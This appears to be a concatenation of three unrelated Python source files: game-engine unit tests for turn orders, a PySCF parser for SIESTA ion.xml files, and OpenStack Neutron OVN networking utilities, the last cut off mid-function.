gvt = models.Government.objects.all()[0]
t = factories.TurnFactory(game=self.game, year=1900, season='FA')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='B')
t = factories.TurnFactory(game=self.game, year=1901, season='S')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='B',
actor='brest.l', action='M', target='picardy.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='piedmont.l', action='M', target='tuscany.l')
t = factories.TurnFactory(game=self.game, year=1901, season='SR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='M', target='paris.l')
t = factories.TurnFactory(game=self.game, year=1901, season='F')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='paris.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='tuscany.l', action='M', target='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='paris.l', action='M', target='burgundy.l')
recent = t.recent_orders()
self.assertEqual(len(recent), 1)
power, orders = recent[0]
self.assertEqual(power, gvt.power_display)
self.assertEqual(len(orders), 2)
(actor1, orders1), (actor2, orders2) = orders
self.assertCountEqual([actor1, actor2], ['brest.l', 'piedmont.l'])
orders = {actor1: orders1, actor2: orders2}
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['brest.l']],
[('S', 1901), ('SR', 1901)])
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['piedmont.l']],
[('S', 1901)])
def test_recent_orders_fall_retreat(self):
gvt = models.Government.objects.all()[0]
t = factories.TurnFactory(game=self.game, year=1901, season='SR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='M', target='paris.l')
t = factories.TurnFactory(game=self.game, year=1901, season='F')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='paris.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='B',
actor='tuscany.l', action='M', target='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='paris.l', action='M', target='burgundy.l')
t = factories.TurnFactory(game=self.game, year=1901, season='FR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='burgundy.l', previous='paris.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='tuscany.l', action='M', target='rome.l')
recent = t.recent_orders()
self.assertEqual(len(recent), 1)
power, orders = recent[0]
self.assertEqual(power, gvt.power_display)
self.assertEqual(len(orders), 2)
(actor1, orders1), (actor2, orders2) = orders
self.assertCountEqual([actor1, actor2], ['paris.l', 'tuscany.l'])
orders = {actor1: orders1, actor2: orders2}
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['paris.l']],
[('F', 1901)])
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['tuscany.l']],
[('F', 1901)])
def test_recent_orders_fall_adjustment(self):
gvt = models.Government.objects.all()[0]
t = factories.TurnFactory(game=self.game, year=1901, season='SR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='M', target='paris.l')
t = factories.TurnFactory(game=self.game, year=1901, season='F')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='paris.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='B',
actor='tuscany.l', action='M', target='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='paris.l', action='M', target='burgundy.l')
t = factories.TurnFactory(game=self.game, year=1901, season='FR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='burgundy.l', previous='paris.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='tuscany.l', action='M', target='rome.l')
t = factories.TurnFactory(game=self.game, year=1901, season='FA')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='burgundy.l', previous='burgundy.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='rome.l', previous='tuscany.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='marseilles.l', action='B')
recent = t.recent_orders()
self.assertEqual(len(recent), 1)
power, orders = recent[0]
self.assertEqual(power, gvt.power_display)
self.assertEqual(len(orders), 2)
(actor1, orders1), (actor2, orders2) = orders
self.assertCountEqual([actor1, actor2], ['paris.l', 'tuscany.l'])
orders = {actor1: orders1, actor2: orders2}
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['paris.l']],
[('F', 1901)])
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['tuscany.l']],
[('F', 1901), ('FR', 1901)])
| |
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function
import numpy as np
from xml.dom import minidom
import sys
import re
def str2int(string):
numeric_const_pattern = r"""
[-+]? # optional sign
(?:
(?: \d* \. \d+ ) # .1 .12 .123 etc 9.1 etc 98.1 etc
|
(?: \d+ \.? ) # 1. 12. 123. etc 1 12 123 etc
)
# followed by optional exponent part if desired
(?: [Ee] [+-]? \d+ ) ?
"""
rx = re.compile(numeric_const_pattern, re.VERBOSE)
nb = rx.findall(string)
for i in enumerate(nb): nb[i[0]] = int(i[1])
return np.array(nb)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
def str2float(string):
numeric_const_pattern = r"""
[-+]? # optional sign
(?:
(?: \d* \. \d+ ) # .1 .12 .123 etc 9.1 etc 98.1 etc
|
(?: \d+ \.? ) # 1. 12. 123. etc 1 12 123 etc
)
# followed by optional exponent part if desired
(?: [Ee] [+-]? \d+ ) ?
"""
rx = re.compile(numeric_const_pattern, re.VERBOSE)
nb = rx.findall(string)
for i in enumerate(nb): nb[i[0]] = float(i[1])
return np.array(nb)
def siesta_ion_xml(fname):
"""
Read the ion.xml file of a specie
Input parameters:
-----------------
fname (str): name of the ion file
Output Parameters:
------------------
ion (dict): The ion dictionnary contains all the data
from the ion file. Each field of the xml file give
one key.
The different keys are:
'lmax_basis': int
'self_energy': float
'z': int
'symbol': str
'label': str
'mass': flaot
'lmax_projs': int
'basis_specs': str
'norbs_nl': int
'valence': float
'nprojs_nl: int
The following keys give the pao field,
'npts': list of int
'delta':list of float
'cutoff': list of float
'data':list of np.arrayof shape (npts[i], 2)
'orbital': list of dictionary
'projector': list of dictionary
"""
doc = minidom.parse(fname)
#the elements from the header
elements_headers = [['symbol', str], ['label', str], ['z', int], ['valence', float],
['mass', float], ['self_energy', float], ['lmax_basis', int], ['norbs_nl', int],
['lmax_projs', int], ['nprojs_nl', int]]
ion = {}
for i, elname in enumerate(elements_headers):
name = doc.getElementsByTagName(elname[0])
ion[elname[0]] = get_data_elements(name[0], elname[1])
#extract the basis_specs
name = doc.getElementsByTagName("basis_specs")
ion["basis_specs"] = getNodeText(name[0])
#for node in doc.getElementsByTagName('paos'): # visit every node <bar />
# #print node.toxml()
# for delt in node.getElementsByTagName('delta'):
# print getNodeText(delt)
#node = doc.getElementsByTagName("pao")
#print('pao: ', node)
field = {'paos': 'orbital', 'kbs': 'projector', 'vna': None,
'chlocal': None, 'reduced_vlocal': None, 'core': None}
for k, v in field.items():
if (len(doc.getElementsByTagName(k))>0):
ion[k] = extract_field_elements(doc.getElementsByTagName(k)[0], field=v)
else:
ion[k] = None
return ion
def getNodeText(node):
nodelist = node.childNodes
result = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
result.append(node.data)
return ''.join(result)
def get_data_elements(name, dtype):
"""
return the right type of the element value
"""
if dtype is int:
data = str2int(getNodeText(name))
if len(data) > 1:
return np.array(data)
elif len(data) == 1:
return data[0]
else:
raise ValueError("len(data)<1 ??")
elif dtype is float:
data = str2float(getNodeText(name))
if len(data) > 1:
return np.array(data)
elif len(data) == 1:
return data[0]
else:
raise ValueError("len(data)<1 ??")
elif dtype is str:
return getNodeText(name)
else:
raise ValueError('not implemented')
def extract_field_elements(doc, field=None):
"""
extract the different pao element of the xml file
Input Parameters:
-----------------
field: field name of the node
doc (minidom.parse)
Output Parameters:
------------------
pao (dict): the following keys are added to the ion dict:
npts
delta
cutoff
data
orbital
"""
if len(doc.getElementsByTagName('delta')) <1 :
return None
# checks if some of the values are null
for i, delt in enumerate(doc.getElementsByTagName('delta')):
if get_data_elements(delt, float) == 0.0:
return None
# if all(delta) > 0.0 then fill the dict
pao = {}
pao['npaos'] = len(doc.getElementsByTagName('delta'))
if pao['npaos'] != len(doc.getElementsByTagName('cutoff')) or\
pao['npaos'] != len(doc.getElementsByTagName('npts')):
raise ValueError('Error reqding ion file! npaos is not constant??')
pao['delta'] = np.zeros((pao['npaos']), dtype=float)
pao['cutoff'] = np.zeros((pao['npaos']), dtype=float)
pao['npts'] = np.zeros((pao['npaos']), dtype=int)
pao['data'] = []
for i, delt in enumerate(doc.getElementsByTagName('delta')):
pao['delta'][i] = get_data_elements(delt, float)
for i, delt in enumerate(doc.getElementsByTagName('cutoff')):
pao['cutoff'][i] = get_data_elements(delt, float)
for i, delt in enumerate(doc.getElementsByTagName('npts')):
pao['npts'][i] = get_data_elements(delt, int)
for i, dat in enumerate(doc.getElementsByTagName('data')):
pao['data'].append(get_data_elements(dat, float).reshape(pao["npts"][i], 2))
if len(pao['data']) != pao['npaos']:
raise ValueError('Error reading ion file, len(data) != npaos')
if field is not None:
name_orbital = doc.getElementsByTagName(field)
pao[field] = []
if field == 'orbital':
for i in range(len(name_orbital)):
pao[field].append(extract_orbital(name_orbital[i]))
elif field == 'projector':
for i in range(len(name_orbital)):
pao[field].append(extract_projector(name_orbital[i]))
else:
raise ValueError(field + ' not implemented, onlt orbital or projector!!')
if len(pao[field]) != pao['npaos']:
raise ValueError('Error reading ion file, len(' + field +') != npaos')
return pao
def extract_orbital(orb_xml):
"""
extract the orbital
"""
orb = {}
#print('key: ', orb_xml.attributes.keys)
#print('l values', orb_xml.attributes['l'].value)
orb['l'] = int(orb_xml.attributes['l'].value)
orb['n'] = int(orb_xml.attributes['n'].value)
orb['z'] = int(orb_xml.attributes['z'].value)
orb['ispol'] = int(orb_xml.attributes['ispol'].value)
orb['population'] = float(orb_xml.attributes['population'].value)
return orb
def extract_projector(pro_xml):
"""
extract the projector
"""
pro = {}
pro['l'] = int(pro_xml.attributes['l'].value)
pro['n'] = int(pro_xml.attributes['n'].value)
#print('ref_energy', pro_xml.attributes['ref_energy'].value)
pro['ref_energy'] = float(pro_xml.attributes['ref_energy'].value)
return pro
#
# Executable part
#
if __name__=="__main__":
import sys
fname = sys.argv[1] #has an error out of range!!
ionxml = siesta_ion_xml(fname)
print(dir(ionxml))
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import inspect
import os
import re
import netaddr
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import extra_dhcp_opt as edo_ext
from neutron_lib.api.definitions import l3
from neutron_lib.api.definitions import port_security as psec
from neutron_lib.api.definitions import portbindings
from neutron_lib.api import validators
from neutron_lib import constants as const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from neutron_lib.utils import net as n_utils
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import netutils
from oslo_utils import strutils
from ovsdbapp import constants as ovsdbapp_const
from neutron._i18n import _
from neutron.common.ovn import constants
from neutron.common.ovn import exceptions as ovn_exc
from neutron.common import utils as common_utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import models_v2
from neutron.objects import ports as ports_obj
LOG = log.getLogger(__name__)
CONF = cfg.CONF
DNS_RESOLVER_FILE = "/etc/resolv.conf"
AddrPairsDiff = collections.namedtuple(
'AddrPairsDiff', ['added', 'removed', 'changed'])
PortExtraDHCPValidation = collections.namedtuple(
'PortExtraDHCPValidation', ['failed', 'invalid_ipv4', 'invalid_ipv6'])
def ovn_name(id):
# The name of the OVN entry will be neutron-<UUID>
# This is due to the fact that the OVN application checks if the name
# is a UUID. If so then there will be no matches.
# We prefix the UUID to enable us to use the Neutron UUID when
# updating, deleting etc.
return "%s%s" % (constants.OVN_NAME_PREFIX, id)
def ovn_lrouter_port_name(id):
# The name of the OVN lrouter port entry will be lrp-<UUID>
# This is to distinguish with the name of the connected lswitch patch port,
# which is named with neutron port uuid, so that OVS patch ports are
# generated properly. The pairing patch port names will be:
# - patch-lrp-<UUID>-to-<UUID>
# - patch-<UUID>-to-lrp-<UUID>
# lrp stands for Logical Router Port
return constants.LRP_PREFIX + '%s' % id
def ovn_cr_lrouter_port_name(_id):
# The name of the OVN chassisredirect lrouter port entry will be
# cr-lrp-<UUID>
return 'cr-lrp-%s' % _id
def ovn_provnet_port_name(network_id):
# The name of OVN lswitch provider network port entry will be
# provnet-<Network-UUID>. The port is created for network having
# provider:physical_network attribute.
return constants.OVN_PROVNET_PORT_NAME_PREFIX + '%s' % network_id
def ovn_vhu_sockpath(sock_dir, port_id):
# Frame the socket path of a virtio socket
return os.path.join(
sock_dir,
# this parameter will become the virtio port name,
# so it should not exceed IFNAMSIZ(16).
(const.VHOST_USER_DEVICE_PREFIX + port_id)[:14])
def ovn_addrset_name(sg_id, ip_version):
# The name of the address set for the given security group id and ip
# version. The format is:
# as-<ip version>-<security group uuid>
# with all '-' replaced with '_'. This replacement is necessary
# because OVN doesn't support '-' in an address set name.
return ('as-%s-%s' % (ip_version, sg_id)).replace('-', '_')
def ovn_pg_addrset_name(sg_id, ip_version):
# The name of the address set for the given security group id modelled as a
# Port Group and ip version. The format is:
# pg-<security group uuid>-<ip version>
# with all '-' replaced with '_'. This replacement is necessary
# because OVN doesn't support '-' in an address set name.
return ('pg-%s-%s' % (sg_id, ip_version)).replace('-', '_')
def ovn_port_group_name(sg_id):
# The name of the port group for the given security group id.
# The format is: pg-<security group uuid>.
return ('pg-%s' % sg_id).replace('-', '_')
def is_network_device_port(port):
return port.get('device_owner', '').startswith(
const.DEVICE_OWNER_PREFIXES)
def _is_dhcp_disabled(dhcp_opt):
return (dhcp_opt['opt_name'] == constants.DHCP_DISABLED_OPT and
dhcp_opt.get('opt_value', '').lower() == 'true')
def validate_port_extra_dhcp_opts(port):
"""Validate port's extra DHCP options.
:param port: A neutron port.
:returns: A PortExtraDHCPValidation object.
"""
invalid = {const.IP_VERSION_4: [], const.IP_VERSION_6: []}
failed = False
for edo in port.get(edo_ext.EXTRADHCPOPTS, []):
ip_version = edo['ip_version']
opt_name = edo['opt_name']
# If DHCP is disabled for this port via this special option,
# always succeed the validation
if _is_dhcp_disabled(edo):
failed = False
break
if opt_name not in constants.SUPPORTED_DHCP_OPTS_MAPPING[ip_version]:
invalid[ip_version].append(opt_name)
failed = True
return PortExtraDHCPValidation(
failed=failed,
invalid_ipv4=invalid[const.IP_VERSION_4] if failed else [],
invalid_ipv6=invalid[const.IP_VERSION_6] if failed else [])
def get_lsp_dhcp_opts(port, ip_version):
# Get dhcp options from Neutron port, for setting DHCP_Options row
# in OVN.
lsp_dhcp_disabled = False
lsp_dhcp_opts = {}
if is_network_device_port(port):
lsp_dhcp_disabled = True
else:
mapping = constants.SUPPORTED_DHCP_OPTS_MAPPING[ip_version]
for edo in port.get(edo_ext.EXTRADHCPOPTS, []):
if edo['ip_version'] != ip_version:
continue
if _is_dhcp_disabled(edo):
# OVN native DHCP is disabled on this port
lsp_dhcp_disabled = True
# Make sure return value behavior not depends on the order and
# content of the extra DHCP options for the port
lsp_dhcp_opts.clear()
break
if edo['opt_name'] not in mapping:
LOG.warning('The DHCP option %(opt_name)s on port %(port)s '
'is not suppported by OVN, ignoring it',
{'opt_name': edo['opt_name'], 'port': port['id']})
continue
opt = mapping[edo['opt_name']]
lsp_dhcp_opts[opt] = edo['opt_value']
return (lsp_dhcp_disabled, lsp_dhcp_opts)
def is_lsp_trusted(port):
return n_utils.is_port_trusted(port) if port.get('device_owner') else False
def is_lsp_ignored(port):
# Since the floating IP port is not bound to any chassis, packets from vm
# destined to floating IP will be dropped. To overcome this, we do not
# create/update floating IP port in OVN.
return port.get('device_owner') in [const.DEVICE_OWNER_FLOATINGIP]
def get_lsp_security_groups(port, skip_trusted_port=True):
# In other agent link OVS, skipping trusted port is processed in security
# groups RPC. We haven't that step, so we do it here.
return [] if (skip_trusted_port and is_lsp_trusted(port)
) else port.get('security_groups', [])
def is_snat_enabled(router):
return router.get(l3.EXTERNAL_GW_INFO, {}).get('enable_snat', True)
def is_port_security_enabled(port):
return port.get(psec.PORTSECURITY)
def is_security_groups_enabled(port):
return port.get(constants.PORT_SECURITYGROUPS)
def validate_and_get_data_from_binding_profile(port):
if (constants.OVN_PORT_BINDING_PROFILE not in port or
not validators.is_attr_set(
port[constants.OVN_PORT_BINDING_PROFILE])):
return {}
param_set = {}
param_dict = {}
vnic_type = port.get(portbindings.VNIC_TYPE, portbindings.VNIC_NORMAL)
# A port's capabilities is listed as part of the binding profile, but we
# treat it separately and do not want it to be included in the generic
# validation.
binding_profile = copy.deepcopy(port[constants.OVN_PORT_BINDING_PROFILE])
capabilities = binding_profile.pop(constants.PORT_CAP_PARAM, [])
if not isinstance(capabilities, list):
msg = _('Invalid binding:profile. %s must be of type list.'
) % constants.PORT_CAP_PARAM
raise n_exc.InvalidInput(error_message=msg)
for pbp_param_set in constants.OVN_PORT_BINDING_PROFILE_PARAMS:
if pbp_param_set.vnic_type:
if pbp_param_set.vnic_type != vnic_type:
continue
if capabilities and pbp_param_set.capability not in capabilities:
continue
param_set = pbp_param_set.param_set
param_keys = param_set.keys()
for param_key in param_keys:
try:
param_dict[param_key] = binding_profile[param_key]
except KeyError:
pass
if len(param_dict) == 0:
continue
if len(param_dict) != len(param_keys):
msg = _('Invalid binding:profile. %s are all '
'required.') % param_keys
raise n_exc.InvalidInput(error_message=msg)
if (len(binding_profile) != len(param_keys)):
msg = _('Invalid binding:profile. too many parameters')
raise n_exc.InvalidInput(error_message=msg)
break
if not param_dict:
return {}
# With this example param_set:
#
# param_set = {
# 'do_not_check_this_key': None,
# 'pci_slot': [str],
# 'physical_network': [str, type(None)]
# }
#
# We confirm that each binding_profile key is of one of the listed types,
# allowing validation of polymorphic entries.
#
# 'physical_network' is polymorphic because: When a VNIC_REMOTE_MANAGED or
# VNIC_DIRECT with PORT_CAP_SWITCHDEV capability port is attached to a
# project network backed by an overlay (tunneled) network the value will be
# 'None'. For the case of ports attached to a project network backed by
# VLAN the value will be of type ``str``. This comes from Nova and is
# provided in the ``physical_network`` tag in the Nova PCI Passthrough
# configuration.
#
# In the above example the type of the value behind 'do_not_check_this_key'
# will not be checked, 'pci_slot' must be ``str``, 'physical_network must
# be either ``str`` or ``NoneType``.
for param_key, param_types in param_set.items():
if param_types is None:
continue
param_value = param_dict[param_key]
for param_type in param_types:
if isinstance(param_value, param_type):
break
else:
msg = _('Invalid binding:profile. %(key)s %(value)s '
'value invalid type') % {'key': param_key,
'value': param_value}
raise n_exc.InvalidInput(error_message=msg)
# Make sure we can successfully look up the port indicated by
# parent_name. Just let it raise the right exception if there is a
# problem.
if 'parent_name' in param_set:
plugin = directory.get_plugin()
plugin.get_port(n_context.get_admin_context(),
param_dict['parent_name'])
if 'tag' in param_set:
tag = int(param_dict['tag'])
if tag < 0 or tag > 4095:
msg = _('Invalid binding:profile. tag "%s" must be '
'an integer between 0 and 4095, inclusive') % tag
raise n_exc.InvalidInput(error_message=msg)
return param_dict
def is_dhcp_options_ignored(subnet):
# Don't insert DHCP_Options entry for v6 subnet with 'SLAAC' as
# 'ipv6_address_mode', since DHCPv6 shouldn't work for this mode.
return (subnet['ip_version'] == const.IP_VERSION_6 and
subnet.get('ipv6_address_mode') == const.IPV6_SLAAC)
def get_ovn_ipv6_address_mode(address_mode):
return constants.OVN_IPV6_ADDRESS_MODES[address_mode]
def get_revision_number(resource, resource_type):
"""Get the resource's revision number based on its type."""
if resource_type in (constants.TYPE_NETWORKS,
constants.TYPE_PORTS,
constants.TYPE_SECURITY_GROUP_RULES,
constants.TYPE_ROUTERS,
constants.TYPE_ROUTER_PORTS,
constants.TYPE_SECURITY_GROUPS,
constants.TYPE_FLOATINGIPS, constants.TYPE_SUBNETS):
return resource['revision_number']
else:
raise ovn_exc.UnknownResourceType(resource_type=resource_type)
def remove_macs_from_lsp_addresses(addresses):
"""Remove the mac addreses from the Logical_Switch_Port addresses column.
:param addresses: The list of addresses from the Logical_Switch_Port.
Example: ["80:fa:5b:06:72:b7 158.36.44.22",
"ff:ff:ff:ff:ff:ff 10.0.0.2"]
:returns: A list of IP addesses (v4 and v6)
"""
ip_list = []
for addr in addresses:
ip_list.extend([x for x in addr.split() if
(netutils.is_valid_ipv4(x) or
netutils.is_valid_ipv6(x))])
return ip_list
def get_allowed_address_pairs_ip_addresses(port):
"""Return a list of IP addresses from port's allowed_address_pairs.
:param port: A neutron port
:returns: A list of IP addesses (v4 and v6)
"""
return [x['ip_address'] for x in port.get('allowed_address_pairs', [])
if 'ip_address' in x]
def get_allowed_address_pairs_ip_addresses_from_ovn_port(ovn_port):
"""Return a list of IP addresses from ovn port.
Return a list of IP addresses equivalent of Neutron's port
allowed_address_pairs column using the data in the OVN port.
:param ovn_port: A OVN port
:returns: A list of IP addesses (v4 and v6)
"""
addresses = remove_macs_from_lsp_addresses(ovn_port.addresses)
port_security = remove_macs_from_lsp_addresses(ovn_port.port_security)
return [x for x in port_security if x not in addresses]
def get_ovn_port_security_groups(ovn_port, skip_trusted_port=True):
info = {'security_groups': ovn_port.external_ids.get(
constants.OVN_SG_IDS_EXT_ID_KEY, '').split(),
'device_owner': ovn_port.external_ids.get(
constants.OVN_DEVICE_OWNER_EXT_ID_KEY, '')}
return get_lsp_security_groups(info, skip_trusted_port=skip_trusted_port)
def get_ovn_port_addresses(ovn_port):
addresses = remove_macs_from_lsp_addresses(ovn_port.addresses)
port_security = remove_macs_from_lsp_addresses(ovn_port.port_security)
return list(set(addresses + port_security))
def sort_ips_by_version(addresses):
ip_map = {'ip4': [], 'ip6': []}
for addr in addresses:
ip_version = netaddr.IPNetwork(addr).version
ip_map['ip%d' % ip_version].append(addr)
return ip_map
def is_lsp_router_port(port):
return port.get('device_owner') in const.ROUTER_PORT_OWNERS
def get_lrouter_ext_gw_static_route(ovn_router):
return [route for route in getattr(ovn_router, 'static_routes', []) if
strutils.bool_from_string(getattr(
route, 'external_ids', {}).get(
constants.OVN_ROUTER_IS_EXT_GW, 'false'))]
def get_lrouter_snats(ovn_router):
return [n for n in getattr(ovn_router, 'nat', []) if n.type == 'snat']
def get_lrouter_non_gw_routes(ovn_router):
routes = []
for route in getattr(ovn_router, 'static_routes', []):
external_ids = getattr(route, 'external_ids', {})
if strutils.bool_from_string(
external_ids.get(constants.OVN_ROUTER_IS_EXT_GW, 'false')):
continue
routes.append({'destination': route.ip_prefix,
'nexthop': route.nexthop})
return routes
def is_ovn_l3(l3_plugin):
return hasattr(l3_plugin, '_ovn_client_inst')
def get_system_dns_resolvers(resolver_file=DNS_RESOLVER_FILE):
resolvers = []
if not os.path.exists(resolver_file):
return resolvers
with open(resolver_file, 'r') as rconf:
for line in rconf.readlines():
if not line.startswith('nameserver'):
continue
line = line.split('nameserver')[1].strip()
valid_ip = (netutils.is_valid_ipv4(line, strict=True) or
netutils.is_valid_ipv6(line))
if valid_ip:
resolvers.append(line)
return resolvers
def get_dhcp_dns_servers(subnet, ip_version=const.IP_VERSION_4):
"""Retrieve the DHCP option DNS servers
The DHCP should not announce any DNS resolver at all on the subnet if any
configured DNS server is "0.0.0.0" (IPv4) or "::" (IPv6).
https://docs.openstack.org/neutron/latest/admin/config-dns-res.html
"""
def filter_ips(ips, ip_version=const.IP_VERSION_4):
return [ip for ip in ips
if netaddr.IPAddress(ip).version == ip_version]
dns_servers = (subnet.get('dns_nameservers') or
filter_ips(ovn_conf.get_dns_servers(), ip_version) or
filter_ips(get_system_dns_resolvers(), ip_version))
if common_utils.is_dns_servers_any_address(dns_servers, ip_version):
return []
return dns_servers
def get_port_subnet_ids(port):
fixed_ips = list(port['fixed_ips'])
return [f['subnet_id'] for f in fixed_ips]
def get_method_class(method):
if not inspect.ismethod(method):
return
return method.__self__.__class__
def ovn_metadata_name(id_):
"""Return the OVN metadata name based on an id."""
return 'metadata-%s' % id_
def is_gateway_chassis_invalid(chassis_name, gw_chassis,
physnet, chassis_physnets):
"""Check if gateway chassis is invalid
@param chassis_name: gateway chassis name
@type chassis_name: string
@param gw_chassis: List of gateway chassis in the system
@type gw_chassis: []
@param physnet: physical network associated to chassis_name
@type physnet: string
@param chassis_physnets: Dictionary linking chassis with their physnets
@type chassis_physnets: {}
@return Boolean
"""
if chassis_name == constants.OVN_GATEWAY_INVALID_CHASSIS:
return True
elif chassis_name not in chassis_physnets:
return True
elif physnet and physnet not in chassis_physnets.get(chassis_name):
return True
elif gw_chassis and chassis_name not in gw_chassis:
return True
return False
def is_provider_network(network):
return network.get(external_net.EXTERNAL, False)
def compute_address_pairs_diff(ovn_port, neutron_port):
"""Compute the differences in the allowed_address_pairs field."""
ovn_ap = get_allowed_address_pairs_ip_addresses_from_ovn_port(
ovn_port)
neutron_ap = get_allowed_address_pairs_ip_addresses(neutron_port)
added = set(neutron_ap) - set(ovn_ap)
removed = set(ovn_ap) - set(neutron_ap)
return AddrPairsDiff(added, removed, changed=any(added or removed))
def get_ovn_cms_options(chassis):
"""Return the list of CMS options in a Chassis."""
return [opt.strip() for opt in chassis.external_ids.get(
constants.OVN_CMS_OPTIONS, '').split(',')]
def is_gateway_chassis(chassis):
"""Check if the given chassis is a gateway chassis"""
return constants.CMS_OPT_CHASSIS_AS_GW in get_ovn_cms_options(chassis)
def get_port_capabilities(port):
"""Return a list of port's capabilities"""
return port.get(portbindings.PROFILE, {}).get(constants.PORT_CAP_PARAM, [])
def get_port_id_from_gwc_row(row):
"""Return a port_id from gwc row
The Gateway_Chassis row stores router port_id in
the row name attribute:
<prefix>-<port_id>_<chassis_id>
:param row: A Gateway_Chassis table row.
:returns: String containing router port_id.
"""
return constants.RE_PORT_FROM_GWC.search(row.name).group(2)
def get_chassis_availability_zones(chassis):
"""Return a list of availability zones from a given OVN Chassis."""
azs = set()
if not chassis:
return azs
opt_key = constants.CMS_OPT_AVAILABILITY_ZONES + '='
for opt in get_ovn_cms_options(chassis):
if not opt.startswith(opt_key):
continue
values = opt.split('=')[1]
azs = {az.strip() for az in values.split(':') if az.strip()}
break
return azs
def get_chassis_in_azs(chassis_list, az_list):
"""Return a set of Chassis that belongs to the AZs.
Given a list of Chassis and a list of availability zones (AZs),
return a set of Chassis that belongs to one or more AZs.
:param chassis_list: A list of Chassis objects
:param az_list: A list of availability zones
:returns: A set of Chassis names
"""
chassis = set()
for ch in chassis_list:
chassis_azs = get_chassis_availability_zones(ch)
if chassis_azs.intersection(az_list):
chassis.add(ch.name)
return chassis
def get_gateway_chassis_without_azs(chassis_list):
"""Return a set of Chassis that does not belong to any AZs.
Filter a list of Chassis and return only the Chassis that does not
belong to any availability zones.
:param chassis_list: A list of Chassis objects
:returns: A set of Chassis names
"""
return {ch.name for ch in chassis_list if is_gateway_chassis(ch) and not
get_chassis_availability_zones(ch)}
def parse_ovn_lb_port_forwarding(ovn_rtr_lb_pfs):
"""Return a dictionary compatible with port forwarding from OVN lb."""
result = {}
for ovn_lb in ovn_rtr_lb_pfs:
ext_ids = ovn_lb.external_ids
fip_id = ext_ids.get(constants.OVN_FIP_EXT_ID_KEY)
protocol = (ovn_lb.protocol[0]
if ovn_lb.protocol else ovsdbapp_const.PROTO_TCP)
fip_dict = result.get(fip_id, {})
fip_dict_proto = fip_dict.get(protocol, set())
ovn_vips = ovn_lb.vips
for vip, ips in ovn_vips.items():
